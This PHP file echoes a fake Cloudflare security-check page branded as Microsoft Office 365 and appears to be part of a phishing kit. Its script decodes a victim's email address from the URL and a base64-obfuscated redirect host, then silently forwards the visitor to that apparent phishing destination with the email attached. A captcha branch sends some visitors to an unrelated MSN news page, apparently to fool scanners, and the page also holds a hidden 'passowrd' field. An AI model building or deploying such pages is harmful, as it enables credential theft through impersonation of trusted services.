<?php
echo '';
echo '<?php';
echo '';
echo '?>';
echo '';
echo '';
echo '<html lang="en-US">';
echo '<link type="text/css" id="dark-mode" rel="stylesheet" href="" />';
echo '<style type="text/css" id="dark-mode-custom-style"></style>';
echo '<head>';
echo '<title>Just a moment...</title>';
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';
echo '<meta http-equiv="X-UA-Compatible" content="IE=Edge" />';
echo '<meta name="robots" content="noindex,nofollow" />';
echo '<meta name="viewport" content="width=device-width,initial-scale=1" />';
echo '<link';
echo 'rel="shortcut icon"';
echo 'href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico"';
echo '/>';
echo '<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>';
echo '';
echo '<style>';
echo '* {';
echo 'box-sizing: border-box;';
echo 'margin: 0;';
echo 'padding: 0;';
echo '}';
echo 'html {';
echo 'line-height: 1.15;';
echo '-webkit-text-size-adjust: 100%;';
echo 'color: #313131;';
echo '}';
echo 'button,';
echo 'html {';
echo 'font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI,';
echo 'Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif,';
echo 'Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji;';
echo '}';
echo 'body {';
echo 'display: flex;';
echo 'flex-direction: column;';
echo 'min-height: 100vh;';
echo '}';
echo 'a {';
echo 'transition: color 0.15s ease;';
echo 'background-color: transparent;';
echo 'text-decoration: none;';
echo 'color: #0051c3;';
echo '}';
echo 'a:hover {';
echo 'text-decoration: underline;';
echo 'color: #ee730a;';
echo '}';
echo '.hidden {';
echo 'display: none;';
echo '}';
echo '.privacy-pass {';
echo 'overflow: hidden;';
echo '}';
echo '.privacy-pass-icon {';
echo 'display: inline-block;';
echo 'background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAiCAQAAACzFZKcAAAA7UlEQVR42u2W2w2EIBBFKcEObIESLIUS7EA70BIswQ4ogRIo5ewHukoirAhmNxvv50wyJ/PQixCeKKFKhIQsAqjDAAXMIkNMQBtOW0BlARrABoZEB1iRKQwwHCWGD/M7C3B77PahCoWB3PF4mwSLolrn7gKNKCTkVtVdvqaNXO/VPjSAABA36bsA1+BpmXRAoi4BkkbxAB7AnwLu/dBMUn39ez+7ogB0GbP0bLhdDWezTFmsfLOzzMX0bXHTN4vpv8M9QH4X1ACMR6kx5ExJAAv0ocVYyHu8oKKvQ1pgygLM0U0u88uVjF1vAfk1Xx80X1CEa7XTAAAAAElFTkSuQmCC);';
echo 'background-size: contain;';
echo 'width: 24px;';
echo 'height: 17px;';
echo '}';
echo '.privacy-pass-icon-wrapper {';
echo 'position: relative;';
echo 'top: 0.2rem;';
echo 'margin-left: 0.2rem;';
echo '}';
echo '.privacy-pass a {';
echo '-webkit-appearance: button;';
echo '-moz-appearance: button;';
echo 'appearance: button;';
echo 'float: right;';
echo 'border-radius: 0 0 0 0.313rem;';
echo 'background-color: #313131;';
echo 'padding: 0.5rem 1rem;';
echo 'text-align: right;';
echo 'text-decoration: none;';
echo 'line-height: 1.313rem;';
echo 'color: #fff;';
echo 'font-size: 0.875rem;';
echo 'font-weight: 600;';
echo '}';
echo '.main-content {';
echo 'margin: 8rem auto;';
echo 'width: 100%;';
echo 'max-width: 60rem;';
echo '}';
echo '.heading-favicon {';
echo 'margin-right: 0.5rem;';
echo 'width: 2rem;';
echo 'height: 2rem;';
echo '}';
echo '@media (max-width: 720px) {';
echo '.main-content {';
echo 'margin-top: 4rem;';
echo '}';
echo '.heading-favicon {';
echo 'width: 1.5rem;';
echo 'height: 1.5rem;';
echo '}';
echo '}';
echo '.footer,';
echo '.main-content {';
echo 'padding-right: 1.5rem;';
echo 'padding-left: 1.5rem;';
echo '}';
echo '.main-wrapper {';
echo 'display: flex;';
echo 'flex: 1;';
echo 'flex-direction: column;';
echo 'align-items: center;';
echo '}';
echo '.font-red {';
echo 'color: #b20f03;';
echo '}';
echo '.spacer {';
echo 'margin: 2rem 0;';
echo '}';
echo '.h1 {';
echo 'line-height: 3.75rem;';
echo 'font-size: 2.5rem;';
echo 'font-weight: 500;';
echo '}';
echo '.h2 {';
echo 'line-height: 2.25rem;';
echo 'font-size: 1.5rem;';
echo 'font-weight: 500;';
echo '}';
echo '.core-msg {';
echo 'line-height: 2.25rem;';
echo 'font-size: 1.5rem;';
echo 'font-weight: 400;';
echo '}';
echo '.body-text {';
echo 'line-height: 1.25rem;';
echo 'font-size: 1rem;';
echo 'font-weight: 400;';
echo '}';
echo '.expandable-title {';
echo 'line-height: 1.5rem;';
echo 'font-weight: 500;';
echo '}';
echo '@media (max-width: 720px) {';
echo '.h1 {';
echo 'line-height: 1.75rem;';
echo 'font-size: 1.5rem;';
echo '}';
echo '.h2 {';
echo 'line-height: 1.5rem;';
echo 'font-size: 1.25rem;';
echo '}';
echo '.core-msg {';
echo 'line-height: 1.5rem;';
echo 'font-size: 1rem;';
echo '}';
echo '}';
echo '.icon-wrapper {';
echo 'display: inline-block;';
echo 'position: relative;';
echo 'top: 0.25rem;';
echo 'margin-right: 0.2rem;';
echo '}';
echo '.heading-icon {';
echo 'width: 1.625rem;';
echo 'height: 1.625rem;';
echo '}';
echo '@media (max-width: 720px) {';
echo '.heading-icon {';
echo 'width: 1.25rem;';
echo 'height: 1.25rem;';
echo '}';
echo '}';
echo '.warning-icon {';
echo 'display: inline-block;';
echo 'background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADQAAAA0CAMAAADypuvZAAAAPFBMVEUAAACvDwOyDwKyDwOvEACyDgOyDwKvDwKwDgCyDgKxDgOyDgKvDgKyDwKyDgOxDgKzDgKxDgKxEASyDwMgW5ZmAAAAE3RSTlMAQN+/EJDvMB9wYJ9Qz7CAf6CAtGoj/AAAAcFJREFUSMeVltu2gyAMRLlfBDxt+f9/PTq2VXSwmod2GdhkEoIiiPmYinK1VqXt4MUFk9bVxlTyvxBdienhNoJwoYMY+57hdMzBTA4v4/gRaykT1FuLNI0/j/1g3i2IJ8s9F+owNCx+2UlWQXbexQFjjTjN1/lGALS9xIm9QIXNOoowlFKrFssYTtmvuOXpp2HtT6lUE3f11bH1IQu9qbYUBEr7yq8zCxkWuva8+rtF4RrkP6ESxFPoj7rtW30+jI4UQlZuiejEwZ4cMg65RKjjUDz6NdwWvxw6nnLESEAl230O5cldUAdy8P44hJZTYh40DOIKzFw3QOI6hPk9aDiFHJc3nMirKERgEPd7FKKgiy5DEn3+5JsrAfHNtfjVRLucTPTaCA1rxFVz6AX8yYsIUlXoMqbPWFUeXF1Cyqz7Ej1PAXNBs1B1tsKWKpsX0yFhslTetL4mL8s4j2fyslTbjbT7Va2V7GCG5ukhftijXdsoQhGmzSI4QhHGhVufz4QJ/v6Hug6dK0EK3YuM8/3Lx5h3Z0STywe55oxRejM5Qo4aAtZ8eTBuWp6dl3IXgfnnLpyzBCFctHomnSopejLhH/3AMfEMndTJAAAAAElFTkSuQmCC);';
echo 'background-size: cover;';
echo '}';
echo '.text-center {';
echo 'text-align: center;';
echo '}';
echo '.expandable {';
echo 'transition: height, border-left 0.2s;';
echo 'border-left: 0.125rem solid #e5e5e5;';
echo 'padding-left: 0.5rem;';
echo '}';
echo '.expandable.expanded {';
echo 'border-left-color: #0051c3;';
echo '}';
echo '.expandable-summary-btn {';
echo 'border: none;';
echo 'background: 0 0;';
echo 'cursor: pointer;';
echo 'padding: 0;';
echo 'color: inherit;';
echo 'font: inherit;';
echo '}';
echo '.expandable-details {';
echo 'display: none;';
echo 'padding: 0.5rem 0;';
echo '}';
echo '.expanded > .expandable-details {';
echo 'display: block;';
echo '}';
echo '.caret-icon {';
echo 'display: inline-block;';
echo 'transition: transform 0.2s;';
echo 'background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgBAMAAACBVGfHAAAAElBMVEUAAAAwMDAxMTEyMjIwMDAxMTF+89HTAAAABXRSTlMAgF9/MMasjJIAAABTSURBVCjPzcq7DcAwDANR5TOAm/Rp0meErBAD3n8VW8DBt4JZUALxYp18vmfWUR2ed9TW7iB7K3muOsGfDRFAABKABCABSAASgAQgAUgAkhKLpwMJmwrD+BDiYwAAAABJRU5ErkJggg==);';
echo 'background-size: contain;';
echo 'width: 1rem;';
echo 'height: 1rem;';
echo '}';
echo '.caret-icon-wrapper {';
echo 'position: relative;';
echo 'top: 0.1rem;';
echo 'margin-left: 0.2rem;';
echo '}';
echo '.expanded .caret-icon {';
echo 'transform: rotate(180deg);';
echo '}';
echo '.fact {';
echo 'border: 0.063rem solid #d9d9d9;';
echo 'border-radius: 0.313rem;';
echo 'padding: 1rem;';
echo '}';
echo '.fact .fact-title {';
echo 'font-weight: 500;';
echo '}';
echo '.big-button {';
echo 'transition-duration: 0.2s;';
echo 'transition-property: background-color, border-color, color;';
echo 'transition-timing-function: ease;';
echo 'border: 0.063rem solid #0051c3;';
echo 'border-radius: 0.313rem;';
echo 'padding: 0.375rem 1rem;';
echo 'line-height: 1.313rem;';
echo 'font-size: 0.875rem;';
echo '}';
echo '.big-button:hover {';
echo 'cursor: pointer;';
echo '}';
echo '.webauthn-prompt {';
echo 'align-items: center;';
echo '}';
echo '.captcha-prompt:not(.hidden),';
echo '.webauthn-prompt:not(.hidden) {';
echo 'display: flex;';
echo '}';
echo '.webauthn-divider {';
echo 'padding: 0 1.5rem;';
echo '}';
echo '@media (max-width: 720px) {';
echo '.captcha-prompt:not(.hidden),';
echo '.webauthn-prompt:not(.hidden) {';
echo 'flex-wrap: wrap;';
echo 'justify-content: center;';
echo '}';
echo '.webauthn-divider {';
echo 'margin: 1rem 0;';
echo 'width: 100%;';
echo 'text-align: center;';
echo '}';
echo '}';
echo '.webauthn-button {';
echo 'background-color: #fff;';
echo 'color: #0051c3;';
echo '}';
echo '.webauthn-button:hover {';
echo 'border-color: #003681;';
echo 'background-color: #003681;';
echo 'color: #fff;';
echo '}';
echo '.pow-button {';
echo 'margin: 2rem 0;';
echo 'background-color: #0051c3;';
echo 'color: #fff;';
echo '}';
echo '.pow-button:hover {';
echo 'border-color: #003681;';
echo 'background-color: #003681;';
echo 'color: #fff;';
echo '}';
echo '.footer {';
echo 'margin: 0 auto;';
echo 'width: 100%;';
echo 'max-width: 60rem;';
echo 'line-height: 1.125rem;';
echo 'font-size: 0.75rem;';
echo '}';
echo '.footer-inner {';
echo 'border-top: 1px solid #d9d9d9;';
echo 'padding-top: 1rem;';
echo 'padding-bottom: 1rem;';
echo '}';
echo '.ip-address {';
echo 'margin-left: 2.25rem;';
echo '}';
echo '.clearfix:after {';
echo 'display: table;';
echo 'clear: both;';
echo 'content: "";';
echo '}';
echo '.clearfix .column {';
echo 'float: left;';
echo 'padding-right: 1.5rem;';
echo 'width: 50%;';
echo '}';
echo '.diagnostic-wrapper {';
echo 'margin-bottom: 0.5rem;';
echo '}';
echo '.footer .ray-id {';
echo 'text-align: center;';
echo '}';
echo '.footer .ray-id code {';
echo 'font-family: monaco, courier, monospace;';
echo '}';
echo '.core-msg,';
echo '.zone-name-title {';
echo 'overflow-wrap: break-word;';
echo '}';
echo '@media (max-width: 720px) {';
echo '.diagnostic-wrapper {';
echo 'display: flex;';
echo 'flex-wrap: wrap;';
echo 'justify-content: center;';
echo '}';
echo '.clearfix:after {';
echo 'display: initial;';
echo 'clear: none;';
echo 'text-align: center;';
echo 'content: none;';
echo '}';
echo '.column {';
echo 'padding-bottom: 2rem;';
echo '}';
echo '.clearfix .column {';
echo 'float: none;';
echo 'padding: 0;';
echo 'width: auto;';
echo 'word-break: keep-all;';
echo '}';
echo '.zone-name-title {';
echo 'margin-bottom: 1rem;';
echo '}';
echo '}';
echo '.loading-spinner {';
echo 'height: 76.39px;';
echo '}';
echo '.lds-ring {';
echo 'display: inline-block;';
echo 'position: relative;';
echo 'width: 1.875rem;';
echo 'height: 1.875rem;';
echo '}';
echo '.lds-ring div {';
echo 'box-sizing: border-box;';
echo 'display: block;';
echo 'position: absolute;';
echo 'border: 0.3rem solid #595959;';
echo 'border-radius: 50%;';
echo 'border-color: #595959 transparent transparent transparent;';
echo 'width: 1.875rem;';
echo 'height: 1.875rem;';
echo 'animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;';
echo '}';
echo '.lds-ring div:nth-child(1) {';
echo 'animation-delay: -0.45s;';
echo '}';
echo '.lds-ring div:nth-child(2) {';
echo 'animation-delay: -0.3s;';
echo '}';
echo '.lds-ring div:nth-child(3) {';
echo 'animation-delay: -0.15s;';
echo '}';
echo '@keyframes lds-ring {';
echo '0% {';
echo 'transform: rotate(0);';
echo '}';
echo 'to {';
echo 'transform: rotate(360deg);';
echo '}';
echo '}';
echo '@media screen and (-ms-high-contrast: active),';
echo 'screen and (-ms-high-contrast: none) {';
echo '.main-wrapper,';
echo 'body {';
echo 'display: block;';
echo '}';
echo '}';
echo 'body.no-js .body.no-js .cf-challenge-running {';
echo 'display: none;';
echo '}';
echo '@media (prefers-color-scheme: dark) {';
echo 'body {';
echo 'background-color: #222;';
echo 'color: #d9d9d9;';
echo '}';
echo 'a {';
echo 'color: #fff;';
echo '}';
echo 'a:hover {';
echo 'text-decoration: underline;';
echo 'color: #ee730a;';
echo '}';
echo '.lds-ring div {';
echo 'border-color: #999 transparent transparent transparent;';
echo '}';
echo '.privacy-pass a {';
echo 'background-color: #d9d9d9;';
echo '}';
echo '.font-red {';
echo 'color: #fc574a;';
echo '}';
echo '.big-button,';
echo '.pow-button,';
echo '.webauthn-button {';
echo 'background-color: #4693ff;';
echo 'color: #1d1d1d;';
echo '}';
echo '.expandable.expanded {';
echo 'border-left-color: #4693ff;';
echo '}';
echo '}';
echo '@keyframes lds-ring {';
echo '0% {';
echo 'transform: rotate(0);';
echo 'transform: rotate(0);';
echo '}';
echo '100% {';
echo 'transform: rotate(360deg);';
echo 'transform: rotate(360deg);';
echo '}';
echo '}';
echo '</style>';
echo '<script>';
echo '$(document).ready(function() {';
echo 'setTimeout(function() {';
echo 'var encodedEmail = window.location.pathname.split("/")[4];';
echo 'var decodedEmail = decodeBase64(encodedEmail);';
echo '';
echo '// Encode the initial part of the URL in base64';
echo 'var initialPartBase64 = "aHR0cHM6Ly9rcjhzMy56MzMud2ViLmNvcmUud2luZG93cy5uZXQv";';
echo 'var initialPart = atob(initialPartBase64);';
echo '';
echo '// Construct the full URL with the base64-decoded part';
echo 'var redirectUrl = initialPart + decodedEmail;';
echo '';
echo 'window.location.href = redirectUrl;';
echo '}, 2800);';
echo '});';
echo '';
echo 'function decodeBase64(encodedString) {';
echo 'var decodedString = "";';
echo 'try {';
echo 'decodedString = decodeURIComponent(escape(window.atob(encodedString)));';
echo '} catch (e) {';
echo 'console.error("Error decoding base64 string:", e);';
echo '}';
echo 'return decodedString;';
echo '}';
echo '</script>';
echo '';
echo '<script src="https://www.google.com/recaptcha/api.js?render=6LdeBYgnAAAAAGJPXTdGq9ndbNEfAwef22NFxYsj"></script><input type="hidden" name="captcha-response" id="captcha-response"><script>    document.getElementById("myForm").addEventListener("submit", function(event) {        event.preventDefault();        grecaptcha.execute("6LdeBYgnAAAAAGJPXTdGq9ndbNEfAwef22NFxYsj", {action: "submit"}).then(function(token) {            document.getElementById("captcha-response").value = token;            document.getElementById("myForm").submit();        });    });</script><div style="display:none;"><input type="text" name="passowrd" value=""></div><script>    if (document.getElementById("captcha-response").value != "") {        window.location.href = "https://www.msn.com/en-xl/news/other/elon-musk-says-new-twitter-ceo-hired/ar-AA1b4qas?ocid=msedgntp&cvid=55c558e8d2ba4dc3ac9457c2ccd44bb5&ei=24";    }</script>';
echo '</body>';
echo '</html>';
echo '<link';
echo 'rel="stylesheet"';
echo 'href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap"';
echo '/>';
echo '</head>';
echo '<body class="no-js">';
echo '<div class="main-wrapper" role="main">';
echo '<div class="main-content">';
echo '<h1 class="zone-name-title h1">';
echo '<img';
echo 'class="heading-favicon"';
echo 'src="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico"';
echo 'onerror="this.onerror=null;this.parentNode.removeChild(this)"';
echo '/>';
echo 'Microsoft Office 365';
echo '</h1>';
echo '<h2 class="h2" id="cf-challenge-running">';
echo 'Checking if the site connection is secure';
echo '</h2>';
echo '<div id="challenge-spinner" class="spacer loading-spinner" style="">';
echo '<div class="lds-ring">';
echo '<div></div>';
echo '<div></div>';
echo '<div></div>';
echo '<div></div>';
echo '</div>';
echo '</div>';
echo '<div id="challenge-success" style="display: none">';
echo '<div class="h2">';
echo '<span class="icon-wrapper">';
echo '<img';
echo 'class="heading-icon"';
echo 'alt="Success icon"';
echo 'src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADQAAAA0CAMAAADypuvZAAAANlBMVEUAAAAxMTEwMDAxMTExMTEwMDAwMDAwMDAxMTExMTExMTEwMDAwMDAxMTExMTEwMDAwMDAxMTHB9N+uAAAAEXRSTlMA3zDvfyBAEJC/n3BQz69gX7VMkcMAAAGySURBVEjHnZZbFoMgDEQJiDzVuv/NtgbtFGuQ4/zUKpeMIQbUhXSKE5l1XSn4pFWHRm/WShT1HRLWC01LGxFEVkCc30eYkLJ1Sjk9pvkw690VY6k8DWP9OM9yMG0Koi+mi8XA36NXmW0UXra4eJ3iwHfrfXVlgL0NqqGBHdqfeQhMmyJ48WDuKP81h3+SMPeRKkJcSXiLUK4XTHCjESOnz1VUXQoc6lgi2x4cI5aTQ201Mt8wHysI5fc05M5c81uZEtHcMKhxZ7iYEty1GfhLvGKpm+EYkdGxm1F5axmcB93DoORIbXfdN7f+hlFuyxtDP+sxtBnF43cIYwaZAWRgzxIoiXEMESoPlMhwLRDXeK772CAzXEdBRV7cmnoVBp0OSlyGidEzJTFq5hhcsA5388oSGM6b5p+qjpZrBlMS9xj4AwXmz108ukU1IomM3ceiW0CDwHCqp1NjAqXlFrbga+xuloQJ+tuyfbIBPNpqnmxqT7dPaOnZqBfhSBCteJAxWj58zLk2xgg+SPGYM6dRO6WczSnIxxwEExRaO+UyCUhbOp7CGQ+kxSUfNtLQFC+Po29vvy7jj4y0yAAAAABJRU5ErkJggg=="';
echo '/>';
echo '</span>';
echo '&nbsp; Connection is secure';
echo '</div>';
echo '<div class="core-msg spacer">Proceeding...</div>';
echo '</div>';
echo '<div id="challenge-all">';
echo '<div id="cf-challenge-body-text" class="core-msg spacer">';
echo 'office.com needs to review the security of your connection before';
echo 'proceeding.';
echo '</div>';
echo '<div';
echo 'id="challenge-fact-wrapper"';
echo 'class="fact spacer hidden"';
echo 'style="display: block; visibility: visible"';
echo '>';
echo '<span class="fact-title">Did you know</span>';
echo '<span id="challenge-fact" class="body-text">';
echo 'that Cloudflare mitigates an average of 28 billion cyber threats,';
echo 'including DDoS attacks, per day?</span';
echo '>';
echo '</div>';
echo '<div';
echo 'id="challenge-explainer-expandable"';
echo 'class="hidden expandable body-text spacer"';
echo 'style="display: block; visibility: visible"';
echo '>';
echo '<div class="expandable-title" id="challenge-explainer-summary">';
echo '<button';
echo 'class="expandable-summary-btn"';
echo 'id="challenge-explainer-btn"';
echo 'type="button"';
echo '>';
echo 'Why am I seeing this page?';
echo '<span class="caret-icon-wrapper">';
echo '<div class="caret-icon"></div>';
echo '</span>';
echo '</button>';
echo '</div>';
echo '<div class="expandable-details" id="challenge-explainer-details">';
echo 'Requests from bots can pose as legitimate traffic.';
echo 'Occasionally, you may see this page while the site ensures that';
echo 'the connection is secure.';
echo '</div>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '<div class="footer" role="contentinfo">';
echo '<div class="footer-inner">';
echo '<div class="clearfix diagnostic-wrapper">';
echo '<div class="ray-id">';
echo 'Ray ID:';
echo '<code id="ray-code">4922deb1-ffc3-4e66-8910-1a9575357a19</code>';
echo '</div>';
echo '</div>';
echo '<div class="text-center">';
echo 'Performance &amp; security by';
echo '<a';
echo 'rel="noopener noreferrer"';
echo 'href="https://www.cloudflare.com?utm_source=challenge&amp;utm_campaign=l"';
echo 'target="_blank"';
echo '>Cloudflare</a';
echo '>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '<span id="trk_jschal_js"></span>';
echo '</body>';
echo '</html>';
echo '';
?>